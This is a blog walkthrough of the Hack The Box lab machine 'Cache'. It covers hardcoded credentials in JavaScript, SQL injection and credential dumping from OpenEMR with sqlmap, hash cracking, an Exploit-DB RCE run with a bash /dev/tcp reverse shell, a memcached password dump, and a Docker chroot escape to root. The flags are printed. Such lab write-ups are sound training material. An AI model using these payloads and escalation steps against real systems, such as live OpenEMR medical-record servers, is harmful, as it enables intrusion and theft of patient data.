24th October 2020
Hack The Box Write-Up Cache by T13nn3s

Hack The Box Write-Up Cache – 10.10.10.188

“It’s Impossible.” said Pride. “It’s Risky.” said Experience. “It’s Pointless.” said Reason. If you really are Hacker! then Give it a try!

PCbots Lab’s

About Cache

In this post, I’m writing a write-up for the machine Cache from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills 

Cache is an ‘medium’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 15, and submitting the root flag you points will be raised by 30.

Foothold
The initial foothold for this box has taken me some time. After some searching on the login page in the source files, I found the login credentials. But, I ended up on a ‘page is under construction’ after logging in. After some searching, I checked the author page and added hms.htb to my host’s file. After visiting the webpage http://hms.htb and landed on an OpenEMR login page. I found that this version of OpenEMR has an authenticated remote execution vulnerability.

User
By exploiting OpenEMR I had a reverse shell as the user www-data. From this account, I jumped to the user account ‘ash’ and I had the permissions to read the user.txt file.

Root
First, I have downloaded LinEnum.sh to this box and run this script as part of my enumeration. I found out that Docker is running and that there is a service using TCP 11211, it turned out to be Memcache. I connected to this service, dumped the data, and get the password for the user ‘luffy’. I created an SSH session as this user to this and run straight to the docker part of this box. With the use of GTFObins, I was able to drop a root shell and root this box.

Machine Info

Hack The Box Write-Up Cache by T13nn3s
Machine Info
Hack The Box Cache Machine IP and maker
Machine IP and makers

Recon

Port scan

As always, I start this box with an port scan.

~$ nmap -sC -sV -oA ./nmap/cache.txt 10.10.10.188

The results.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-15 13:38 EDT
Nmap scan report for 10.10.10.188
Host is up (0.062s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
|   256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
|_  256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.13 seconds

The results are showing that there are two open ports.

  1. 22/tcp (SSH)
  2. 80/tcp (HTTP)

Enumeration Web Server

cache.htb

Let’s start the enumeration with the Web server. I visited the webpage http://10.10.10.188. I landed on an website that is trying to explain: What is Hacking? This is ironic. I think I’m going to hack into this website. Let’s show them what hacking really means.

Hack The Box Cache Hacker website
http://10.10.10.188

After clicking around on the website I found a News page and the Contact Us web page. I tried some common XSS or SQLi commands on the contact form on the Contact Us page, but nothing seems to work. The Author page shows some information about the creator of this box. I also mentioned the login page and jumped to the login page.

I tried some known usernames and passwords, and as expected they are not working. I checked the source code and found some scripting files.

Hack The Box Cache Write-Up Login Page source code
http://10.10.10.188/login.html

I checked every script file and found interesting information from the http://10.10.10.188/jquery/functionality.js, really interesting information. This file contains the login credentials for the login page. It contains the username ash and the password [email protected]_fun.

~$ curl http://10.10.10.188/jquery/functionality.js
$(function(){
    
    var error_correctPassword = false;
    var error_username = false;
    
    function checkCorrectPassword(){
        var Password = $("#password").val();
        if(Password != '[email protected]_fun'){
            alert("Password didn't Match");
            error_correctPassword = true;
        }
    }
    function checkCorrectUsername(){
        var Username = $("#username").val();
        if(Username != "ash"){
            alert("Username didn't Match");
            error_username = true;
        }
    }
    $("#loginform").submit(function(event) {
        /* Act on the event */
        error_correctPassword = false;
         checkCorrectPassword();
         error_username = false;
         checkCorrectUsername();


        if(error_correctPassword == false && error_username ==false){
            return true;
        }
        else{
            return false;
        }
    });
    
});

I logged in on the webpage and ended up on an web page which it seems it is under construction.

Hack The Box Cache Write-Up under construction
http://10.10.10.188/net.html

hms.htb

From this point, it has taken me some time for the next step. I ended up going back to the author page and adding hms.htb to my host’s file and points into the IP of this box 10.10.10.188. I visited the URL hms.htb and ended up on a login portal from OpenEMR.

OpenEMR is the most popular open-source electronic health records and medical practice management solution. The source code of this program is public available on Github.

Hack The Box Cache Write-Up Hospital Managemend System
http://htb.hms

I tried the login credentials on the login form, but they are not working. The source code reveals nothing interesting. I found the default username admin with the default password pass, but they are not working. I ended up on Google and searched for an exploit for OpenEMR. I found an exploit for OpenEMR version 5.0.1.

Intrusion

SQL Injection

On the webpage https://www.exploit-db.com/exploits/45161 I found an exploit for an (Authenticated) Remote Code Execution vulnerability for OpenEMR version 5.0.1. I do not know which version of OpenEMR is running on the box, I can at least try this exploit.

I used searchsploit to copy the exploit to my working directory.

~$ searchsploit opener
...
 searchsploit openEMR
-------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                      |  Path
                                                                                                                                                                    | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
OpenEMR 4.1.2(7) - Multiple SQL Injections                                                                                                                          | exploits/php/webapps/35518.txt
OpenEMR 5.0.0 - OS Command Injection / Cross-Site Scripting                                                                                                         | exploits/php/webapps/43232.txt
OpenEMR 5.0.1.3 - (Authenticated) Arbitrary File Actions                                                                                                            | exploits/linux/webapps/45202.txt
OpenEMR < 5.0.1 - (Authenticated) Remote Code Execution                                                                                                             | exploits/php/webapps/45161.py
OpenEMR Electronic Medical Record Software 3.2 - Multiple Vulnerabilities                                                                                           | exploits/php/webapps/14011.txt
Openemr-4.1.0 - SQL Injection                                                                                                                                       | exploits/php/webapps/17998.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
~$ sudo cp /usr/share/exploitdb/exploits/php/webapps/45161.py .

I’ve read the exploit and watched the YouTube video (https://www.youtube.com/watch?v=DJSQ8Pk_7hc) with the PoC. It’s an authenticated remote code execution exploit, I need first get some credentials in order to get this exploit to work. I’m following to PoC to get through the credentials with SQL Injection.

Through my web browser, I entered the following URL http://hms.htb/portal/add_edit_event_user.php?eid=1′ and I ended up with an SQL error message. I just found the SQL Injection vulnerability. I intercepted the traffic with Burp Suite and saved the request in the file openemr.req.

Hack The Box Cache Write-Up OpenEMR Cross-Site Scripting
OpenEMR 5.0.1

The file openemr.req has the following contents. Note, I removed the apostrophe at the end of the URL.

GET /portal/add_edit_event_user.php?eid=1 HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: OpenEMR=dc79vfqtir944qcotcf9a14qrv; PHPSESSID=n130v72imsdjjg73otlb7a4m3p
Upgrade-Insecure-Requests: 1

I used sqlmap to exploit this vulnerability and found the credentials of the account openemr_admin.

~$ sqlmap -r openemr.req --threads=10 -D openemr -T users_secure --dump
...
15:44:11] [INFO] retrieved: ' '
[15:44:11] [INFO] retrieved: 'openemr_admin'
Database: openemr
Table: users_secure
[1 entry]
+------+--------------------------------+---------------+--------------------------------------------------------------+---------------------+---------------+---------------+-------------------+-------------------+
| id   | salt                           | username      | password                                                     | last_update         | salt_history1 | salt_history2 | password_history1 | password_history2 |
+------+--------------------------------+---------------+--------------------------------------------------------------+---------------------+---------------+---------------+-------------------+-------------------+
| 1    | $2a$05$l2sTLIG6GTBeyBf7TAKL6A$ | openemr_admin | $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B. | 2019-11-21 06:38:40 | NULL          | NULL          | NULL              | NULL              |
+------+--------------------------------+---------------+--------------------------------------------------------------+---------------------+---------------+---------------+-------------------+-------------------+

[15:44:11] [INFO] table 'openemr.users_secure' dumped to CSV file '/home/kali/.sqlmap/output/hms.htb/dump/openemr/users_secure.csv'
[15:44:11] [INFO] fetched data logged to text files under '/home/kali/.sqlmap/output/hms.htb'

I placed the hash of the password in the file open admin_emr_hash.txt and gave this hash to john and the password got cracked really quickly.

~$ john openemr_admin_hash.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 32 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
xxxxxx           (?)
1g 0:00:00:00 DONE 2/3 (2020-05-18 15:48) 2.222g/s 2520p/s 2520c/s 2520C/s water..zombie
Use the "--show" option to display all of the cracked passwords reliably
Session completed

(Authenticated) Remote Code Execution

Now I got the password I can authenticate myself against OpenEMR and use this vulnerability to gain access.

~$ python 45161.py http://hms.htb -u openemr_admin -p xxxxxx -c 'bash -i >& /dev/tcp/10.10.14.48/4444 0>&1'
 .---.  ,---.  ,---.  .-. .-.,---.          ,---.    
/ .-. ) | .-.\ | .-'  |  \| || .-'  |\    /|| .-.\   
| | |(_)| |-' )| `-.  |   | || `-.  |(\  / || `-'/   
| | | | | |--' | .-'  | |\  || .-'  (_)\/  ||   (    
\ `-' / | |    |  `--.| | |)||  `--.| \  / || |\ \   
 )---'  /(     /( __.'/(  (_)/( __.'| |\/| ||_| \)\  
(_)    (__)   (__)   (__)   (__)    '-'  '-'    (__) 
                                                       
   ={   P R O J E C T    I N S E C U R I T Y   }=    
                                                       
         Twitter : @Insecurity                       
         Site    : insecurity.sh                     

[$] Authenticating with openemr_admin:xxxxxx
[$] Injecting payload

www-data / ash

I got a reverse shell as the user www-data. Let’s upgrade the shell to a full shell. I checked the user accounts on this box and found that there are two users ash and luffy. I found the user.txt file In the home folder of ash, but the account www-data does not have permission to read that file.

$ whoami
www-data
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ cd /home
/home$ ls
ash  luffy

I do already have the password of ash, let’s switch to this user and try to read the file.

$ /home$ su - ash
su - ash
Password: [email protected]_fun
$ cd /home/ash
/home/ash$ cat user.txt
18d7de65f788084b8ae999bb67f4b858

I got now user on this box, next step is to do privilege escalation.

Privilege Escalation

Enumeration

I first downloaded LinEnum.sh, my favorite enumeration tool for Linux, to the box and run the script.

[email protected]:~$ bash LinEnum.sh
...
[-] Listening TCP:                                                                                                                                                                                           
Active Internet connections (only servers)                                                                                                                                                                   
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name                                                                                                             
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                                                                                                                            
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                                                                                                                            
tcp        0      0 127.0.0.1:11211         0.0.0.0:*               LISTEN      -                                                                                                                            
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                                                                                                                            
tcp6       0      0 :::22                   :::*                    LISTEN      -                                                                                                                            
tcp6       0      0 :::80                   :::*                    LISTEN      - 

I noticed the server is listening on port 11211, this is not a default port. I checked on Google which possible service can use this port and I found that Memcache is default using TCP port 11211. I checked if this service is running on this box.

[email protected]:~$ systemctl status memcached.service
● memcached.service - memcached daemon
   Loaded: loaded (/lib/systemd/system/memcached.service; enabled; vendor preset: enabled)
   Active: active (running) since Wed 2020-05-20 18:59:06 UTC; 3min 12s ago
     Docs: man:memcached(1)
 Main PID: 920 (memcached)
    Tasks: 10 (limit: 4660)
   CGroup: /system.slice/memcached.service
           └─920 /usr/bin/memcached -m 64 -p 11211 -u memcache -l 127.0.0.1 -…id

Warning: Journal has been rotated since unit was started. Log output is incomplete or unavailable.

Memcache

Aha, memcache is running I create a session to this service and create a data dump.

[email protected]:~$ telnet 127.0.0.1 11211
telnet 127.0.0.1 11211
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
?
?
ERROR
help
help
ERROR
stats items
stats items
STAT items:1:number 5
STAT items:1:number_hot 0
STAT items:1:number_warm 0
STAT items:1:number_cold 5
STAT items:1:age_hot 0
STAT items:1:age_warm 0
STAT items:1:age 51
STAT items:1:evicted 0
STAT items:1:evicted_nonzero 0
STAT items:1:evicted_time 0
STAT items:1:outofmemory 0
STAT items:1:tailrepairs 0
STAT items:1:reclaimed 0
STAT items:1:expired_unfetched 0
STAT items:1:evicted_unfetched 0
STAT items:1:evicted_active 0
STAT items:1:crawler_reclaimed 0
STAT items:1:crawler_items_checked 100
STAT items:1:lrutail_reflocked 0
STAT items:1:moves_to_cold 1690
STAT items:1:moves_to_warm 0
STAT items:1:moves_within_lru 0
STAT items:1:direct_reclaims 0
STAT items:1:hits_to_hot 0
STAT items:1:hits_to_warm 0
STAT items:1:hits_to_cold 0
STAT items:1:hits_to_temp 0
END

With the following command I can grab the password.

get passwd
get passwd
VALUE passwd 0 9
0n3_p1ec3
END

There is an extra user ‘luffy’ on this box and I switch to this user and this password is working for the user luffy.

Docker

I still working through a reverse shell. I found that this user has SSH permissions, so create an SSH session. That is making life much easier.

~$ ssh [email protected]
The authenticity of host '10.10.10.188 (10.10.10.188)' can't be established.
ECDSA key fingerprint is SHA256:/qQ34g2zzGVlmbMIKeD7JhlhDf/SPzgYFz000v+3KBI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.188' (ECDSA) to the list of known hosts.
[email protected]'s password: 
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-99-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed May 20 19:12:35 UTC 2020

  System load:  0.0               Processes:              177
  Usage of /:   73.7% of 8.06GB   Users logged in:        0
  Memory usage: 11%               IP address for ens160:  10.10.10.188
  Swap usage:   0%                IP address for docker0: 172.17.0.1

 * Ubuntu 20.04 LTS is out, raising the bar on performance, security,
   and optimisation for Intel, AMD, Nvidia, ARM64 and Z15 as well as
   AWS, Azure and Google Cloud.

     https://ubuntu.com/blog/ubuntu-20-04-lts-arrives


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

107 packages can be updated.
0 updates are security updates.


Last login: Wed May  6 08:54:44 2020 from 10.10.14.3
[email protected]:~$

The user luffy does not have the proper permissions to open the root.txt flag. I need to do the last step to get to the root flag. At the first part of enumeration for getting root privileges, I’ve run LinEnum.sh and found that docker is running on this box.

[email protected]:~$ docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
ubuntu              latest              2ca708c1c9cc        8 months ago        64.2MB

After a short break on Google, I found this article from GTFObins: https://gtfobins.github.io/gtfobins/docker/ about how to drop a root shell.

[email protected]:~$ docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh
docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh
# whoami
whoami
root
# cat /root/root.txt
cat /root/root.txt
093640d35cee3ae2dd54bf468797bf30

Got the shell and more important root privileges. Did you like this write-up? Please consider spending a respect point, my profile on HTB: https://www.hackthebox.eu/home/users/profile/224856.

Happy Hacking!

T13nn3s

I'm a cybersecurity enthusiast! I'm working as an IT Security Engineer for a company in The Netherlands. I love writing scripts and doing research and pentesting. As a big fan of Hack The Box, I share my write-ups on this blog. I'm blogging because I like to summarize my thoughts and share them with you.

View all posts by T13nn3s →

Leave a Reply

Your email address will not be published. Required fields are marked *